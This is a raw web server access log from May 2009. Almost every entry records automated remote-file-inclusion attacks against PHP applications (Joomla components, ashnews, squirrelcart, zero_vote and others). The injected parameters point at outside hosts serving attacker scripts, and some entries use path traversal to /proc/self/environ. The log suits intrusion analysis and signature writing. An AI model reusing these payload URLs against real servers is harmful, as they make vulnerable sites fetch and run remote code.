121.165.73.157 - - [05/May/2009:09:20:12 -0700] "GET /logs/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:20:27 -0700] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:20:28 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:20:28 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:20:31 -0700] "GET /logs/access_080628.log%20%20//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:20:55 -0700] "GET /logs/access_080726.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:21:03 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:21:03 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:21:03 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.116.178.20 - - [05/May/2009:09:21:03 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:21:05 -0700] "GET /logs/access_081109.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:21:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:21:07 -0700] "GET /ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:21:07 -0700] "GET /logs/access_080518.log%20%20//ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:21:10 -0700] "GET /logs/access_080508.log%20%20//ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:21:43 -0700] "GET /logs/access_081209.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:21:57 -0700] "GET /logs/access_081209.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:22:03 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:22:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:22:03 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:22:03 -0700] "GET /logs/access_080809.log//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.176.64 - - [05/May/2009:09:22:18 -0700] "GET /logs/access_080808.log/squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [05/May/2009:09:22:18 -0700] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/bajocdm2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:23 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:24 -0700] "GET /logs/access_081104.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:24 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:25 -0700] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:41 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:42 -0700] "GET /logs/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:42 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:42 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:42 -0700] "GET /errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:43 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:43 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 50 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:22:43 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 50 "-" "XXXXXX" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:22:47 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [05/May/2009:09:22:47 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.94.239.16 - - [05/May/2009:09:22:49 -0700] "GET /logs/access_090228.log//index.php?content=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:22:52 -0700] "GET /logs/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:22:52 -0700] "GET /administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:22:52 -0700] "GET /logs/access_081104.log%20%20/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:23:14 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:23:14 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:42 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:42 -0700] "GET /logs/access_080330.log//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:42 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.124.146 - - [05/May/2009:09:23:44 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.124.146 - - [05/May/2009:09:23:44 -0700] "GET /logs/access_080824.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.158.124.146 - - [05/May/2009:09:23:44 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:45 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:46 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /logs/access_081104.log%20%20/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /logs/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /logs/access_080330.log%20%20//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:23:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:24:14 -0700] "GET /logs/access_080529.log//poll/png.php?include_path=http://rgruppe.com.au/media/index.log?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [05/May/2009:09:24:19 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:09:24:41 -0700] "GET /logs/access_080313.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:45 -0700] "GET /logs/access_090126.log//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:45 -0700] "GET /poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:46 -0700] "GET /logs//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:51 -0700] "GET /logs/access_090126.log//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:51 -0700] "GET /poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [05/May/2009:09:24:52 -0700] "GET /logs//poll/booth.php?include_path=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:24:55 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:24:57 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:25:00 -0700] "GET /logs/access_081117.log%20%20/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:25:36 -0700] "GET /logs/access_080908.log/index.php?cal=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
74.54.241.100 - - [05/May/2009:09:25:36 -0700] "GET /logs/index.php?cal=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
64.157.4.42 - - [05/May/2009:09:25:39 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:25:43 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [05/May/2009:09:25:43 -0700] "GET /logs/access_071126.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:25:46 -0700] "GET /skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:25:46 -0700] "GET /logs//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:25:46 -0700] "GET /logs/access_071214.log//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:25:49 -0700] "GET /logs/access_081117.log%20%20/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:25:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:09 -0700] "GET /logs/access_081104.log/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:18 -0700] "GET /index.php?cal=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 200 42959 "-" "Mozilla/5.0" "dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:20 -0700] "GET /logs/access_081117.log/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:32 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:32 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:32 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:32 -0700] "GET /logs/access_080908.log%20%20/index.php?cal=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:32 -0700] "GET /logs/access_090102.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:34 -0700] "GET /logs/access_080524.log%20%20//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:34 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:34 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:34 -0700] "GET /logs/access_090102.log%20%20//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:38 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:38 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:38 -0700] "GET /logs/access_080524.log%20%20//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:38 -0700] "GET /logs/access_090102.log%20%20//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:39 -0700] "GET /logs/access_081104.log/administrator/components/com_virtuemart?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:26:40 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:41 -0700] "GET /main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:41 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:41 -0700] "GET /logs//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:41 -0700] "GET /logs/access_090102.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:41 -0700] "GET /logs/access_090102.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:26:42 -0700] "GET /logs/access_090102.log//main.php?sayfa=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:46 -0700] "GET /logs/access_080729.log//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:47 -0700] "GET /logs/access_080729.log//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:47 -0700] "GET /logs//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 98194 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:47 -0700] "GET /logs//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 98194 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:26:48 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:26:48 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:56 -0700] "GET /logs/access_081020.log//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:58 -0700] "GET /logs/access_080729.log%20%20//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:58 -0700] "GET /logs/access_081020.log//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:26:58 -0700] "GET /logs//?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 98194 "-" "Mozilla/5.0" "www.dmulk.com"
